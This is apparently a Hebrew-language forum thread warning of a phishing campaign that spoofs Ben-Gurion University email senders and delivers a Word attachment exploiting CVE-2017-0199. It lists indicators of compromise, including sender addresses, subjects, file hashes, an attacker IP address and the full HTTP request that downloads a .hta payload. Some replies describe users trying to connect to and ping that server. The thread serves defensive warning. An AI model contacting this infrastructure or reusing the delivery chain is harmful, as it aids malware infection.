שימו לב! מייל עם וירוס נשלח בשעות האחרונות.

957

שימו לב בשעות האחרונות מתקבלים דיווחים רבים על הודעות מייל שמתקבלות כביכול מגורמים רשמיים כמו אוניברסיטת בן גוריון וכדו' חלקם בעברית וחלקם באנגלית. ההודעות מכילות וירוס חמור שמאפשר לתוקף לשלוט במחשבכם.
נא נקטו במשנה זהירות בפתיחת הודעות מגורמים לא מוכרים.

למרות שלא קשור לנטפרי ראיתי צורך ליידע את המשתמשים.

למשתמשים המנוסים יותר מצו"ב מעט יותר פרטים.
מכיל אינדיקטורים ראשוניים לזיהוי וחסימה,

וקטור התקיפה:

מייל המידע מכתובת המזוהה עם שרת הדוא״ל של אוניברסיטת בן גוריון המכיל צרופה מסוג DOC.

2 גרסאות למייל הנצפו עד כה:

גרסא 1:

שולח :

arik@bgu.ac.il

נושא המייל:

RE:: אישור קבלת מלגה פרטנית - קרן ידע הנדסי אקדמי

גרסא 2:

שולח:

dtripto@bgu.ac.il

נושא המייל:

::NIH cancer research funding opportunities

שם הקובץ המצורף:

3.doc

md5: 1318a321b1afb2934ff20a3fb686ce77

הקובץ מכיל :

embedded OLE2 link object אשר ככל הנראה ״נטמע״ בקובץ ה - doc באמצעות ניצול cve 2017-0199 לפרטים נוספים:

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199

פגיעות זו מאפשרת לתוקף להפעיל Visual Basic scriptבאמצעות קובץ וורד המכיל את ה - exploit אשר הקורבן נדרש לפתיחתו.

לא ידוע על remedy אחר ל exploit המדובר מלבד הpatch של microsoft.

כאשר המשתמש פותח את הקובץ מתבצעת בקשתhttp ל

80[.]82.67.42 ומוריד ממנו קובץ בשם test5.hta

להלן הבקשה:

"GET /test5.hta HTTP/1.1

Accept: /

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)

Host: 80.82.67.42

Connection: Keep-Alive"

שימו לב ל - user agent הכללי (יחסית) למרות ששום broswer לא ביצע את הבקשה אלא קובץ ה - doc.

md5:
293239948c256f168de06299ffd2845b

כאשר קובץ ה - hta אחרי להורדת קבצים נוספים מסוג ps1 ו - vb אשר פעולתם נחקרת בימים אילו.

שימו לב, מכיוון ששרתי המייל של bgu מוגדרים כרגע ברמת סיכון גבוהה יותר, אנו ממליצים לשקול חסימה זמנית של שרתי הדוא״ל של bgu. (כתובות שרתי הדוא״ל לא נמצאות בקובץ האינדיקטורים).
........................
אנטי וירוס ESET בעברית לרכישה אונליין לחץ כאן

משתמש שנמחק

@957
א. ראשית אין צורך בהתנצלות - זה דבר חשוב מאוד שאין שום דרך להרבה משתמשים לדעת עליה. יישר כח.
ב. ככל שידועים הכתובות, האם נטפרי יכולים לחסום אותם באופן גורף לטובת כל המשתמשים?

clickone

@יהודי-פשוט בגלל שנטפרי עובדת בשיטה של רשימה לבנה, סביר מאד להניח שהכתובת חסומה.
עם זאת, ייתכן שהיא פתוחה לפרוטוקולים מסויימים.
למרות ש @957 דיבר על פרוטוקול HTTP, ולכן רוב הסיכויים שזה חסום בנטפרי.

אני ניסיתי להיכנס לכתובת הזו, וקיבלתי timeout ארוך מאד.
(@957 יישר כח על המחשבה שלך [או של מי שכתב והפיץ את הטקסט הזה] שלא שם את כתובת הIP כתיקנה, אלא שם סוגריים מרובעות באמצע)

למדן וידען

בהמשך יש כן את הכתובת בצורה תיקנית.

957

@למדן-וידען אמר בשימו לב! מייל עם וירוס נשלח בשעות האחרונות.:

בהמשך יש כן את הכתובת בצורה תיקנית.

הכתובת השנייה לא מזיקה כשלעצמה אם מישהו ילחץ עליה.
........................
אנטי וירוס ESET בעברית לרכישה אונליין לחץ כאן

957

@clickone אמר בשימו לב! מייל עם וירוס נשלח בשעות האחרונות.:

אני ניסיתי להיכנס לכתובת הזו, וקיבלתי timeout ארוך מאד.

מצד שני לping זה מגיב.
.......................
אנטי וירוס ESET בעברית לרכישה אונליין לחץ כאן

clickone

@957 פינג זה תגובה שהסרבר פעיל.
עדיין ייתכן שהשרת HTTP תקוע, או שלא מקבל נתון מסויים שמצפה לו.

יעקב.ק

@957 שלחתי לך שאלה למייל?

למדן וידען

@יעקב.ק אמר בשימו לב! מייל עם וירוס נשלח בשעות האחרונות.:

@957 שלחתי לך שאלה למייל?

אתה מנסה להפעיל עליו לחץ דרך הפורום?
אני מאמין שהוא רואה את המייל לפני שהוא נכנס לפורום..